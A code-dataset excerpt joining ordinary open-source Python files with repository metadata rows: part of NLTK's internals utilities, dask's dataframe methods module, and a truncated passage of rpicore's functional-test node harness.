"NLTK was unable to find the %s file!"
"\nUse software specific "
"configuration parameters" % filename
)
if env_vars:
msg += " or set the %s environment variable" % env_vars[0]
msg += "."
if searchpath:
msg += "\n\n Searched in:"
msg += "".join("\n - %s" % d for d in searchpath)
if url:
msg += "\n\n For more information on %s, see:\n <%s>" % (filename, url)
div = "=" * 75
raise LookupError("\n\n%s\n%s\n%s" % (div, msg, div))
def find_file(
filename, env_vars=(), searchpath=(), file_names=None, url=None, verbose=False
):
return next(
find_file_iter(filename, env_vars, searchpath, file_names, url, verbose)
)
def find_dir(
filename, env_vars=(), searchpath=(), file_names=None, url=None, verbose=False
):
return next(
find_file_iter(
filename, env_vars, searchpath, file_names, url, verbose, finding_dir=True
)
)
def find_binary_iter(
name,
path_to_bin=None,
env_vars=(),
searchpath=(),
binary_names=None,
url=None,
verbose=False,
):
"""
Search for a file to be used by nltk.
:param name: The name or path of the file.
:param path_to_bin: The user-supplied binary location (deprecated)
:param env_vars: A list of environment variable names to check.
:param file_names: A list of alternative file names to check.
:param searchpath: List of directories to search.
:param url: URL presented to user for download help.
:param verbose: Whether or not to print path when a file is found.
"""
for file in find_file_iter(
path_to_bin or name, env_vars, searchpath, binary_names, url, verbose
):
yield file
def find_binary(
name,
path_to_bin=None,
env_vars=(),
searchpath=(),
binary_names=None,
url=None,
verbose=False,
):
return next(
find_binary_iter(
name, path_to_bin, env_vars, searchpath, binary_names, url, verbose
)
)
def find_jar_iter(
name_pattern,
path_to_jar=None,
env_vars=(),
searchpath=(),
url=None,
verbose=False,
is_regex=False,
):
"""
Search for a jar that is used by nltk.
:param name_pattern: The name of the jar file
:param path_to_jar: The user-supplied jar location, or None.
:param env_vars: A list of environment variable names to check
in addition to the CLASSPATH variable which is
checked by default.
:param searchpath: List of directories to search.
:param is_regex: Whether name is a regular expression.
"""
assert isinstance(name_pattern, str)
assert not isinstance(searchpath, str)
if isinstance(env_vars, str):
env_vars = env_vars.split()
yielded = False
# Make sure we check the CLASSPATH first
env_vars = ["CLASSPATH"] + list(env_vars)
# If an explicit location was given, then check it, and yield it if
# it's present; otherwise, complain.
if path_to_jar is not None:
if os.path.isfile(path_to_jar):
yielded = True
yield path_to_jar
else:
raise LookupError(
"Could not find %s jar file at %s" % (name_pattern, path_to_jar)
)
# Check environment variables
for env_var in env_vars:
if env_var in os.environ:
if env_var == "CLASSPATH":
classpath = os.environ["CLASSPATH"]
for cp in classpath.split(os.path.pathsep):
if os.path.isfile(cp):
filename = os.path.basename(cp)
if (
is_regex
and re.match(name_pattern, filename)
or (not is_regex and filename == name_pattern)
):
if verbose:
print("[Found %s: %s]" % (name_pattern, cp))
yielded = True
yield cp
# The case where user put directory containing the jar file in the classpath
if os.path.isdir(cp):
if not is_regex:
if os.path.isfile(os.path.join(cp, name_pattern)):
if verbose:
print("[Found %s: %s]" % (name_pattern, cp))
yielded = True
yield os.path.join(cp, name_pattern)
else:
# Look for file using regular expression
for file_name in os.listdir(cp):
if re.match(name_pattern, file_name):
if verbose:
print(
"[Found %s: %s]"
% (
name_pattern,
os.path.join(cp, file_name),
)
)
yielded = True
yield os.path.join(cp, file_name)
else:
jar_env = os.environ[env_var]
jar_iter = (
(
os.path.join(jar_env, path_to_jar)
for path_to_jar in os.listdir(jar_env)
)
if os.path.isdir(jar_env)
else (jar_env,)
)
for path_to_jar in jar_iter:
if os.path.isfile(path_to_jar):
filename = os.path.basename(path_to_jar)
if (
is_regex
and re.match(name_pattern, filename)
or (not is_regex and filename == name_pattern)
):
if verbose:
print("[Found %s: %s]" % (name_pattern, path_to_jar))
yielded = True
yield path_to_jar
# Check the path list.
for directory in searchpath:
if is_regex:
for filename in os.listdir(directory):
path_to_jar = os.path.join(directory, filename)
if os.path.isfile(path_to_jar):
if re.match(name_pattern, filename):
if verbose:
print("[Found %s: %s]" % (filename, path_to_jar))
yielded = True
yield path_to_jar
else:
path_to_jar = os.path.join(directory, name_pattern)
if os.path.isfile(path_to_jar):
if verbose:
print("[Found %s: %s]" % (name_pattern, path_to_jar))
yielded = True
yield path_to_jar
if not yielded:
# If nothing was found, raise an error
msg = "NLTK was unable to find %s!" % name_pattern
if env_vars:
msg += " Set the %s environment variable" % env_vars[0]
msg = textwrap.fill(msg + ".", initial_indent=" ", subsequent_indent=" ")
if searchpath:
msg += "\n\n Searched in:"
msg += "".join("\n - %s" % d for d in searchpath)
if url:
msg += "\n\n For more information, on %s, see:\n <%s>" % (
name_pattern,
url,
)
div = "=" * 75
raise LookupError("\n\n%s\n%s\n%s" % (div, msg, div))
def find_jar(
name_pattern,
path_to_jar=None,
env_vars=(),
searchpath=(),
url=None,
verbose=False,
is_regex=False,
):
return next(
find_jar_iter(
name_pattern, path_to_jar, env_vars, searchpath, url, verbose, is_regex
)
)
def find_jars_within_path(path_to_jars):
return [
os.path.join(root, filename)
for root, dirnames, filenames in os.walk(path_to_jars)
for filename in fnmatch.filter(filenames, "*.jar")
]
def _decode_stdoutdata(stdoutdata):
""" Convert data read from stdout/stderr to unicode """
if not isinstance(stdoutdata, bytes):
return stdoutdata
encoding = getattr(sys.__stdout__, "encoding", locale.getpreferredencoding())
if encoding is None:
return stdoutdata.decode()
return stdoutdata.decode(encoding)
##########################################################################
# Import Stdlib Module
##########################################################################
def import_from_stdlib(module):
"""
When python is run from within the nltk/ directory tree, the
current directory is included at the beginning of the search path.
Unfortunately, that means that modules within nltk can sometimes
shadow standard library modules. As an example, the stdlib
'inspect' module will attempt to import the stdlib 'tokenize'
module, but will instead end up importing NLTK's 'tokenize' module
instead (causing the import to fail).
"""
old_path = sys.path
sys.path = [d for d in sys.path if d not in ("", ".")]
m = __import__(module)
sys.path = old_path
return m
##########################################################################
# Wrapper for ElementTree Elements
##########################################################################
class ElementWrapper:
"""
A wrapper around ElementTree Element objects whose main purpose is
to provide nicer __repr__ and __str__ methods. In addition, any
of the wrapped Element's methods that return other Element objects
are overridden to wrap those values before returning them.
This makes Elements more convenient to work with in
interactive sessions and doctests, at the expense of some
efficiency.
"""
# Prevent double-wrapping:
def __new__(cls, etree):
"""
Create and return a wrapper around a given Element object.
If ``etree`` is an ``ElementWrapper``, then ``etree`` is
returned as-is.
"""
if isinstance(etree, ElementWrapper):
return etree
else:
return object.__new__(ElementWrapper)
def __init__(self, etree):
r"""
Initialize a new Element wrapper for ``etree``.
If ``etree`` is a string, then it will be converted to an
Element object using ``ElementTree.fromstring()`` first:
>>> ElementWrapper("<test></test>")
<Element "<?xml version='1.0' encoding='utf8'?>\n<test />">
"""
if isinstance(etree, str):
etree = ElementTree.fromstring(etree)
self.__dict__["_etree"] = etree
def unwrap(self):
"""
Return the Element object wrapped by this wrapper.
"""
return self._etree
##////////////////////////////////////////////////////////////
# { String Representation
##////////////////////////////////////////////////////////////
def __repr__(self):
s = ElementTree.tostring(self._etree, encoding="utf8").decode("utf8")
if len(s) > 60:
e = s.rfind("<")
if (len(s) - e) > 30:
e = -20
s = "%s...%s" % (s[:30], s[e:])
return "<Element %r>" % s
def __str__(self):
"""
:return: the result of applying ``ElementTree.tostring()`` to
the wrapped Element object.
"""
return (
ElementTree.tostring(self._etree, encoding="utf8").decode("utf8").rstrip()
)
##////////////////////////////////////////////////////////////
# { Element interface Delegation (pass-through)
##////////////////////////////////////////////////////////////
def __getattr__(self, attrib):
return getattr(self._etree, attrib)
def __setattr__(self, attr, value):
return setattr(self._etree, attr, value)
def __delattr__(self, attr):
return delattr(self._etree, attr)
def __setitem__(self, index, element):
self._etree[index] = element
def __delitem__(self, index):
del self._etree[index]
def __setslice__(self, start, stop, elements):
self._etree[start:stop] = elements
def __delslice__(self, start, stop):
del self._etree[start:stop]
def __len__(self):
return len(self._etree)
##////////////////////////////////////////////////////////////
# { Element interface Delegation (wrap result)
##////////////////////////////////////////////////////////////
def __getitem__(self, index):
return ElementWrapper(self._etree[index])
def __getslice__(self, start, stop):
return [ElementWrapper(elt) for elt in self._etree[start:stop]]
def getchildren(self):
return [ElementWrapper(elt) for elt in self._etree]
def getiterator(self, tag=None):
return (ElementWrapper(elt) for elt in self._etree.getiterator(tag))
def makeelement(self, tag, attrib):
return ElementWrapper(self._etree.makeelement(tag, attrib))
def find(self, path):
elt = self._etree.find(path)
if elt is None:
return elt
else:
return ElementWrapper(elt)
def findall(self, path):
return [ElementWrapper(elt) for elt in self._etree.findall(path)]
######################################################################
# Helper for Handling Slicing
######################################################################
def slice_bounds(sequence, slice_obj, allow_step=False):
"""
Given a slice, return the corresponding (start, stop) bounds,
taking into account None indices and negative indices. The
following guarantees are made for the returned start and stop values:
- 0 <= start <= len(sequence)
- 0 <= stop <= len(sequence)
- start <= stop
:raise ValueError: If ``slice_obj.step`` is not None.
:param allow_step: If true, then the slice object may have a
non-None step. If it does, then return a tuple
(start, stop, step).
"""
start, stop = (slice_obj.start, slice_obj.stop)
# If allow_step is true, then include the step in our return
# value tuple.
if allow_step:
step = slice_obj.step
if step is None:
step = 1
# Use a recursive call without allow_step to find the slice
# bounds. If step is negative, then the roles of start and
# stop (in terms of default values, etc), are swapped.
if step < 0:
start, stop = slice_bounds(sequence, slice(stop, start))
else:
start, stop = slice_bounds(sequence, slice(start, stop))
return start, stop, step
# Otherwise, make sure that no non-default step value is used.
elif slice_obj.step not in (None, 1):
raise ValueError(
"slices with steps are not supported by %s" % sequence.__class__.__name__
)
# Supply default offsets.
if start is None:
start = 0
if stop is None:
stop = len(sequence)
# Handle negative indices.
if start < 0:
start = max(0, len(sequence) + start)
if stop < 0:
stop = max(0, len(sequence) + stop)
# Make sure stop doesn't go past the end of the list. Note that
# we avoid calculating len(sequence) if possible, because for lazy
# sequences, calculating the length of a sequence can be expensive.
if stop > 0:
try:
sequence[stop - 1]
except IndexError:
stop = len(sequence)
# Make sure start isn't past stop.
start = min(start, stop)
# That's all folks!
return start, stop
######################################################################
# Permission Checking
######################################################################
def is_writable(path):
# Ensure that it exists.
if not os.path.exists(path):
return False
# If we're on a posix system, check its permissions.
if hasattr(os, "getuid"):
statdata = os.stat(path)
perm = stat.S_IMODE(statdata.st_mode)
# is it world-writable?
if perm & 0o002:
return True
# do we own it?
elif statdata.st_uid == os.getuid() and (perm & 0o200):
return True
# are we in a group that can write to it?
elif (statdata.st_gid in [os.getgid()] + os.getgroups()) and (perm & 0o020):
return True
# otherwise, we can't write to it.
else:
return False
# Otherwise, we'll assume it's writable.
# [xx] should we do other checks on other platforms?
return True
######################################################################
# NLTK Error reporting
######################################################################
def raise_unorderable_types(ordering, a, b):
raise TypeError(
"unorderable types: %s() %s %s()"
% (type(a).__name__, ordering, type(b).__name__)
)
| 34.057168 | 99 | 0.554193 |
9f95e5e57836084fbaca4ddce1cff3d5f005ca9d | 17,061 | py | Python | dask/dataframe/methods.py | nickvazz/dask | f6e9e81903bd2416125a97cc3856c63bb792bddf | [
"BSD-3-Clause"
] | null | null | null | dask/dataframe/methods.py | nickvazz/dask | f6e9e81903bd2416125a97cc3856c63bb792bddf | [
"BSD-3-Clause"
] | null | null | null | dask/dataframe/methods.py | nickvazz/dask | f6e9e81903bd2416125a97cc3856c63bb792bddf | [
"BSD-3-Clause"
] | null | null | null | import warnings
import numpy as np
import pandas as pd
from pandas.api.types import is_categorical_dtype, union_categoricals
from tlz import partition
from .utils import (
is_series_like,
is_index_like,
is_dataframe_like,
hash_object_dispatch,
group_split_dispatch,
)
from ..utils import Dispatch
# ---------------------------------
# indexing
# ---------------------------------
def loc(df, iindexer, cindexer=None):
"""
.loc for known divisions
"""
if cindexer is None:
return df.loc[iindexer]
else:
return df.loc[iindexer, cindexer]
def iloc(df, cindexer=None):
return df.iloc[:, cindexer]
def try_loc(df, iindexer, cindexer=None):
"""
.loc for unknown divisions
"""
try:
return loc(df, iindexer, cindexer)
except KeyError:
return df.head(0).loc[:, cindexer]
def boundary_slice(
df, start, stop, right_boundary=True, left_boundary=True, kind="loc"
):
"""Index slice start/stop. Can switch include/exclude boundaries.
Examples
--------
>>> df = pd.DataFrame({'x': [10, 20, 30, 40, 50]}, index=[1, 2, 2, 3, 4])
>>> boundary_slice(df, 2, None)
x
2 20
2 30
3 40
4 50
>>> boundary_slice(df, 1, 3)
x
1 10
2 20
2 30
3 40
>>> boundary_slice(df, 1, 3, right_boundary=False)
x
1 10
2 20
2 30
Empty input DataFrames are returned
>>> df_empty = pd.DataFrame()
>>> boundary_slice(df_empty, 1, 3)
Empty DataFrame
Columns: []
Index: []
"""
if len(df.index) == 0:
return df
if kind == "loc" and not df.index.is_monotonic:
# Pandas treats missing keys differently for label-slicing
# on monotonic vs. non-monotonic indexes
# If the index is monotonic, `df.loc[start:stop]` is fine.
# If it's not, `df.loc[start:stop]` raises when `start` is missing
if start is not None:
if left_boundary:
df = df[df.index >= start]
else:
df = df[df.index > start]
if stop is not None:
if right_boundary:
df = df[df.index <= stop]
else:
df = df[df.index < stop]
return df
else:
result = getattr(df, kind)[start:stop]
if not right_boundary and stop is not None:
right_index = result.index.get_slice_bound(stop, "left", kind)
result = result.iloc[:right_index]
if not left_boundary and start is not None:
left_index = result.index.get_slice_bound(start, "right", kind)
result = result.iloc[left_index:]
return result
def index_count(x):
# Workaround since Index doesn't implement `.count`
return pd.notnull(x).sum()
def mean_aggregate(s, n):
try:
with warnings.catch_warnings(record=True):
warnings.simplefilter("always")
return s / n
except ZeroDivisionError:
return np.float64(np.nan)
def wrap_var_reduction(array_var, index):
if isinstance(array_var, np.ndarray) or isinstance(array_var, list):
return pd.Series(array_var, index=index)
return array_var
def wrap_skew_reduction(array_skew, index):
if isinstance(array_skew, np.ndarray) or isinstance(array_skew, list):
return pd.Series(array_skew, index=index)
return array_skew
def wrap_kurtosis_reduction(array_kurtosis, index):
if isinstance(array_kurtosis, np.ndarray) or isinstance(array_kurtosis, list):
return pd.Series(array_kurtosis, index=index)
return array_kurtosis
def var_mixed_concat(numeric_var, timedelta_var, columns):
vars = pd.concat([numeric_var, timedelta_var])
return vars.reindex(index=columns)
def describe_aggregate(values):
assert len(values) > 0
# arrange categorical and numeric stats
names = []
values_indexes = sorted((x.index for x in values), key=len)
for idxnames in values_indexes:
for name in idxnames:
if name not in names:
names.append(name)
return pd.concat(values, axis=1, sort=False).reindex(names)
def describe_numeric_aggregate(stats, name=None, is_timedelta_col=False):
assert len(stats) == 6
count, mean, std, min, q, max = stats
if is_series_like(count):
typ = type(count.to_frame())
else:
typ = type(q)
if is_timedelta_col:
mean = pd.to_timedelta(mean)
std = pd.to_timedelta(std)
min = pd.to_timedelta(min)
max = pd.to_timedelta(max)
q = q.apply(lambda x: pd.to_timedelta(x))
part1 = typ([count, mean, std, min], index=["count", "mean", "std", "min"])
q.index = ["{0:g}%".format(l * 100) for l in tolist(q.index)]
if is_series_like(q) and typ != type(q):
q = q.to_frame()
part3 = typ([max], index=["max"])
result = concat([part1, q, part3], sort=False)
if is_series_like(result):
result.name = name
return result
def describe_nonnumeric_aggregate(stats, name):
args_len = len(stats)
is_datetime_column = args_len == 5
is_categorical_column = args_len == 3
assert is_datetime_column or is_categorical_column
if is_categorical_column:
nunique, count, top_freq = stats
else:
nunique, count, top_freq, min_ts, max_ts = stats
# input was empty dataframe/series
if len(top_freq) == 0:
data = [0, 0]
index = ["count", "unique"]
dtype = None
data.extend([None, None])
index.extend(["top", "freq"])
dtype = object
result = pd.Series(data, index=index, dtype=dtype, name=name)
return result
top = top_freq.index[0]
freq = top_freq.iloc[0]
index = ["unique", "count", "top", "freq"]
values = [nunique, count]
if is_datetime_column:
tz = top.tz
top = pd.Timestamp(top)
if top.tzinfo is not None and tz is not None:
# Don't tz_localize(None) if key is already tz-aware
top = top.tz_convert(tz)
else:
top = top.tz_localize(tz)
first = pd.Timestamp(min_ts, tz=tz)
last = pd.Timestamp(max_ts, tz=tz)
index.extend(["first", "last"])
values.extend([top, freq, first, last])
else:
values.extend([top, freq])
return pd.Series(values, index=index, name=name)
def _cum_aggregate_apply(aggregate, x, y):
"""Apply aggregation function within a cumulative aggregation
Parameters
----------
aggregate: function (a, a) -> a
The aggregation function, like add, which is used to and subsequent
results
x:
y:
"""
if y is None:
return x
else:
return aggregate(x, y)
def cumsum_aggregate(x, y):
if x is None:
return y
elif y is None:
return x
else:
return x + y
def cumprod_aggregate(x, y):
if x is None:
return y
elif y is None:
return x
else:
return x * y
def cummin_aggregate(x, y):
if is_series_like(x) or is_dataframe_like(x):
return x.where((x < y) | x.isnull(), y, axis=x.ndim - 1)
else: # scalar
return x if x < y else y
def cummax_aggregate(x, y):
if is_series_like(x) or is_dataframe_like(x):
return x.where((x > y) | x.isnull(), y, axis=x.ndim - 1)
else: # scalar
return x if x > y else y
def assign(df, *pairs):
# Only deep copy when updating an element
# (to avoid modifying the original)
pairs = dict(partition(2, pairs))
deep = bool(set(pairs) & set(df.columns))
df = df.copy(deep=bool(deep))
for name, val in pairs.items():
df[name] = val
return df
def unique(x, series_name=None):
out = x.unique()
# out can be either an np.ndarray or may already be a series
# like object. When out is an np.ndarray, it must be wrapped.
if not (is_series_like(out) or is_index_like(out)):
out = pd.Series(out, name=series_name)
return out
def value_counts_combine(x, sort=True, ascending=False, **groupby_kwargs):
# sort and ascending don't actually matter until the agg step
return x.groupby(level=0, **groupby_kwargs).sum()
def value_counts_aggregate(
x, sort=True, ascending=False, normalize=False, total_length=None, **groupby_kwargs
):
out = value_counts_combine(x, **groupby_kwargs)
if normalize:
out /= total_length if total_length is not None else out.sum()
if sort:
return out.sort_values(ascending=ascending)
return out
def nbytes(x):
return x.nbytes
def size(x):
return x.size
def values(df):
return df.values
def sample(df, state, frac, replace):
rs = np.random.RandomState(state)
return df.sample(random_state=rs, frac=frac, replace=replace) if len(df) > 0 else df
def drop_columns(df, columns, dtype):
df = df.drop(columns, axis=1)
df.columns = df.columns.astype(dtype)
return df
def fillna_check(df, method, check=True):
out = df.fillna(method=method)
if check and out.isnull().values.all(axis=0).any():
raise ValueError(
"All NaN partition encountered in `fillna`. Try "
"using ``df.repartition`` to increase the partition "
"size, or specify `limit` in `fillna`."
)
return out
# ---------------------------------
# reshape
# ---------------------------------
def pivot_agg(df):
return df.groupby(level=0).sum()
def pivot_sum(df, index, columns, values):
return pd.pivot_table(
df, index=index, columns=columns, values=values, aggfunc="sum", dropna=False
)
def pivot_count(df, index, columns, values):
# we cannot determine dtype until concatenationg all partitions.
# make dtype deterministic, always coerce to np.float64
return pd.pivot_table(
df, index=index, columns=columns, values=values, aggfunc="count", dropna=False
).astype(np.float64)
# ---------------------------------
# concat
# ---------------------------------
concat_dispatch = Dispatch("concat")
def concat(
dfs,
axis=0,
join="outer",
uniform=False,
filter_warning=True,
ignore_index=False,
**kwargs
):
"""Concatenate, handling some edge cases:
- Unions categoricals between partitions
- Ignores empty partitions
Parameters
----------
dfs : list of DataFrame, Series, or Index
axis : int or str, optional
join : str, optional
uniform : bool, optional
Whether to treat ``dfs[0]`` as representative of ``dfs[1:]``. Set to
True if all arguments have the same columns and dtypes (but not
necessarily categories). Default is False.
ignore_index : bool, optional
Whether to allow index values to be ignored/droped during
concatenation. Default is False.
"""
if len(dfs) == 1:
return dfs[0]
else:
func = concat_dispatch.dispatch(type(dfs[0]))
return func(
dfs,
axis=axis,
join=join,
uniform=uniform,
filter_warning=filter_warning,
ignore_index=ignore_index,
**kwargs
)
@concat_dispatch.register((pd.DataFrame, pd.Series, pd.Index))
def concat_pandas(
dfs,
axis=0,
join="outer",
uniform=False,
filter_warning=True,
ignore_index=False,
**kwargs
):
if axis == 1:
return pd.concat(dfs, axis=axis, join=join, **kwargs)
# Support concatenating indices along axis 0
if isinstance(dfs[0], pd.Index):
if isinstance(dfs[0], pd.CategoricalIndex):
for i in range(1, len(dfs)):
if not isinstance(dfs[i], pd.CategoricalIndex):
dfs[i] = dfs[i].astype("category")
return pd.CategoricalIndex(union_categoricals(dfs), name=dfs[0].name)
elif isinstance(dfs[0], pd.MultiIndex):
first, rest = dfs[0], dfs[1:]
if all(
(isinstance(o, pd.MultiIndex) and o.nlevels >= first.nlevels)
for o in rest
):
arrays = [
concat([i._get_level_values(n) for i in dfs])
for n in range(first.nlevels)
]
return pd.MultiIndex.from_arrays(arrays, names=first.names)
to_concat = (first.values,) + tuple(k._values for k in rest)
new_tuples = np.concatenate(to_concat)
try:
return pd.MultiIndex.from_tuples(new_tuples, names=first.names)
except Exception:
return pd.Index(new_tuples)
return dfs[0].append(dfs[1:])
# Handle categorical index separately
dfs0_index = dfs[0].index
has_categoricalindex = isinstance(dfs0_index, pd.CategoricalIndex) or (
isinstance(dfs0_index, pd.MultiIndex)
and any(isinstance(i, pd.CategoricalIndex) for i in dfs0_index.levels)
)
if has_categoricalindex:
dfs2 = [df.reset_index(drop=True) for df in dfs]
ind = concat([df.index for df in dfs])
else:
dfs2 = dfs
ind = None
# Concatenate the partitions together, handling categories as needed
if (
isinstance(dfs2[0], pd.DataFrame)
if uniform
else any(isinstance(df, pd.DataFrame) for df in dfs2)
):
if uniform:
dfs3 = dfs2
cat_mask = dfs2[0].dtypes == "category"
else:
# When concatenating mixed dataframes and series on axis 1, Pandas
# converts series to dataframes with a single column named 0, then
# concatenates.
dfs3 = [
df
if isinstance(df, pd.DataFrame)
else df.to_frame().rename(columns={df.name: 0})
for df in dfs2
]
# pandas may raise a RuntimeWarning for comparing ints and strs
with warnings.catch_warnings():
warnings.simplefilter("ignore", RuntimeWarning)
if filter_warning:
warnings.simplefilter("ignore", FutureWarning)
cat_mask = pd.concat(
[(df.dtypes == "category").to_frame().T for df in dfs3],
join=join,
**kwargs
).any()
if cat_mask.any():
not_cat = cat_mask[~cat_mask].index
# this should be aligned, so no need to filter warning
out = pd.concat(
[df[df.columns.intersection(not_cat)] for df in dfs3],
join=join,
**kwargs
)
temp_ind = out.index
for col in cat_mask.index.difference(not_cat):
# Find an example of categoricals in this column
for df in dfs3:
sample = df.get(col)
if sample is not None:
break
# Extract partitions, subbing in missing if needed
parts = []
for df in dfs3:
if col in df.columns:
parts.append(df[col])
else:
codes = np.full(len(df), -1, dtype="i8")
data = pd.Categorical.from_codes(
codes, sample.cat.categories, sample.cat.ordered
)
parts.append(data)
out[col] = union_categoricals(parts)
# Pandas resets index type on assignment if frame is empty
# https://github.com/pandas-dev/pandas/issues/17101
if not len(temp_ind):
out.index = temp_ind
out = out.reindex(columns=cat_mask.index)
else:
# pandas may raise a RuntimeWarning for comparing ints and strs
with warnings.catch_warnings():
warnings.simplefilter("ignore", RuntimeWarning)
if filter_warning:
warnings.simplefilter("ignore", FutureWarning)
out = pd.concat(dfs3, join=join, sort=False)
else:
if is_categorical_dtype(dfs2[0].dtype):
if ind is None:
ind = concat([df.index for df in dfs2])
return pd.Series(union_categoricals(dfs2), index=ind, name=dfs2[0].name)
with warnings.catch_warnings():
if filter_warning:
warnings.simplefilter("ignore", FutureWarning)
out = pd.concat(dfs2, join=join, **kwargs)
# Re-add the index if needed
if ind is not None:
out.index = ind
return out
tolist_dispatch = Dispatch("tolist")
def tolist(obj):
func = tolist_dispatch.dispatch(type(obj))
return func(obj)
@tolist_dispatch.register((pd.Series, pd.Index, pd.Categorical))
def tolist_pandas(obj):
return obj.tolist()
# cuDF may try to import old dispatch functions
hash_df = hash_object_dispatch
group_split = group_split_dispatch
def assign_index(df, ind):
df = df.copy()
df.index = ind
return df
| 28.482471 | 88 | 0.588184 |
cccafdba54829927068eb981f9ad4d22b7639dfa | 11,066 | py | Python | test/functional/test_framework/test_node.py | AFP99/rpicore | cc739f0b74442bfde4e5a7975d7b87166c5dd227 | [
"MIT"
] | 24 | 2018-05-08T15:01:48.000Z | 2022-03-27T19:33:35.000Z | test/functional/test_framework/test_node.py | AFP99/rpicore | cc739f0b74442bfde4e5a7975d7b87166c5dd227 | [
"MIT"
] | 1 | 2019-08-04T07:13:02.000Z | 2019-11-10T18:53:23.000Z | test/functional/test_framework/test_node.py | AFP99/rpicore | cc739f0b74442bfde4e5a7975d7b87166c5dd227 | [
"MIT"
] | 12 | 2018-06-04T09:31:59.000Z | 2022-02-17T00:42:18.000Z | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Class for rpicoind node under test"""
import decimal
import errno
import http.client
import json
import logging
import os
import re
import subprocess
import time
from .authproxy import JSONRPCException
from .util import (
assert_equal,
delete_cookie_file,
get_rpc_proxy,
rpc_url,
wait_until,
p2p_port,
)
# For Python 3.4 compatibility
JSONDecodeError = getattr(json, "JSONDecodeError", ValueError)
BITCOIND_PROC_WAIT_TIMEOUT = 600
class TestNode():
"""A class for representing a rpicoind node under test.
This class contains:
- state about the node (whether it's running, etc)
- a Python subprocess.Popen object representing the running process
- an RPC connection to the node
- one or more P2P connections to the node
To make things easier for the test writer, any unrecognised messages will
be dispatched to the RPC connection."""
def __init__(self, i, dirname, extra_args, rpchost, timewait, binary, stderr, mocktime, coverage_dir, use_cli=False):
self.index = i
self.datadir = os.path.join(dirname, "node" + str(i))
self.rpchost = rpchost
if timewait:
self.rpc_timeout = timewait
else:
# Wait for up to 60 seconds for the RPC server to respond
self.rpc_timeout = 600
if binary is None:
self.binary = os.getenv("BITCOIND", "rpicoind")
else:
self.binary = binary
self.stderr = stderr
self.coverage_dir = coverage_dir
# Most callers will just need to add extra args to the standard list below. For those callers that need more flexibity, they can just set the args property directly.
self.extra_args = extra_args
self.args = [self.binary, "-datadir=" + self.datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-logtimemicros", "-debug", "-debugexclude=libevent", "-debugexclude=leveldb", "-mocktime=" + str(mocktime), "-uacomment=testnode%d" % i]
self.cli = TestNodeCLI(os.getenv("BITCOINCLI", "rpicoin-cli"), self.datadir)
self.use_cli = use_cli
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.url = None
self.log = logging.getLogger('TestFramework.node%d' % i)
self.cleanup_on_exit = True # Whether to kill the node when this object goes away
self.p2ps = []
def __del__(self):
# Ensure that we don't leave any bitcoind processes lying around after
# the test ends
if self.process and self.cleanup_on_exit:
# Should only happen on test failure
# Avoid using logger, as that may have already been shutdown when
# this destructor is called.
print("Cleaning up leftover process")
self.process.kill()
def __getattr__(self, name):
"""Dispatches any unrecognised messages to the RPC connection or a CLI instance."""
if self.use_cli:
return getattr(self.cli, name)
else:
assert self.rpc_connected and self.rpc is not None, "Error: no RPC connection"
return getattr(self.rpc, name)
def start(self, extra_args=None, stderr=None, *args, **kwargs):
"""Start the node."""
if extra_args is None:
extra_args = self.extra_args
if stderr is None:
stderr = self.stderr
# Delete any existing cookie file -- if such a file exists (eg due to
# unclean shutdown), it will get overwritten anyway by bitcoind, and
# potentially interfere with our attempt to authenticate
delete_cookie_file(self.datadir)
self.process = subprocess.Popen(self.args + extra_args, stderr=stderr, *args, **kwargs)
self.running = True
self.log.debug("rpicoind started, waiting for RPC to come up")
def wait_for_rpc_connection(self):
"""Sets up an RPC connection to the rpicoind process. Returns False if unable to connect."""
# Poll at a rate of four times per second
poll_per_s = 4
time.sleep(5)
for _ in range(poll_per_s * self.rpc_timeout):
assert self.process.poll() is None, "rpicoind exited with status %i during initialization" % self.process.returncode
try:
self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)
while self.rpc.getblockcount() < 0:
time.sleep(1)
# If the call to getblockcount() succeeds then the RPC connection is up
self.rpc_connected = True
self.url = self.rpc.url
self.log.debug("RPC successfully started")
return
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
if e.error['code'] != -28: # RPC in warmup?
raise # unknown JSON RPC exception
except ValueError as e: # cookie file not found and no rpcuser or rpcassword. bitcoind still starting
if "No RPC credentials" not in str(e):
raise
time.sleep(1.0 / poll_per_s)
raise AssertionError("Unable to connect to rpicoind")
def get_wallet_rpc(self, wallet_name):
if self.use_cli:
return self.cli("-rpcwallet={}".format(wallet_name))
else:
assert self.rpc_connected
assert self.rpc
wallet_path = "wallet/%s" % wallet_name
return self.rpc / wallet_path
def stop_node(self):
"""Stop the node."""
if not self.running:
return
self.log.debug("Stopping node")
try:
self.stop()
except http.client.CannotSendRequest:
self.log.exception("Unable to stop node.")
del self.p2ps[:]
def is_node_stopped(self):
"""Checks whether the node has stopped.
Returns True if the node has stopped. False otherwise.
This method is responsible for freeing resources (self.process)."""
time.sleep(20)
if not self.running:
return True
return_code = self.process.poll()
if return_code is None:
return False
# process has stopped. Assert that it didn't return an error code.
assert_equal(return_code, 0)
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.log.debug("Node stopped")
return True
def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):
wait_until(self.is_node_stopped, timeout=timeout)
def node_encrypt_wallet(self, passphrase):
""""Encrypts the wallet.
This causes rpicoind to shutdown, so this method takes
care of cleaning up resources."""
self.encryptwallet(passphrase)
self.wait_until_stopped()
def add_p2p_connection(self, p2p_conn, *args, **kwargs):
"""Add a p2p connection to the node.
This method adds the p2p connection to the self.p2ps list and also
returns the connection to the caller."""
if 'dstport' not in kwargs:
kwargs['dstport'] = p2p_port(self.index)
if 'dstaddr' not in kwargs:
kwargs['dstaddr'] = '127.0.0.1'
p2p_conn.peer_connect(*args, **kwargs)
self.p2ps.append(p2p_conn)
return p2p_conn
@property
def p2p(self):
"""Return the first p2p connection
Convenience property - most tests only use a single p2p connection to each
node, so this saves having to write node.p2ps[0] many times."""
assert self.p2ps, "No p2p connection"
return self.p2ps[0]
def disconnect_p2ps(self):
"""Close all p2p connections to the node."""
for p in self.p2ps:
p.peer_disconnect()
del self.p2ps[:]
class TestNodeCLIAttr:
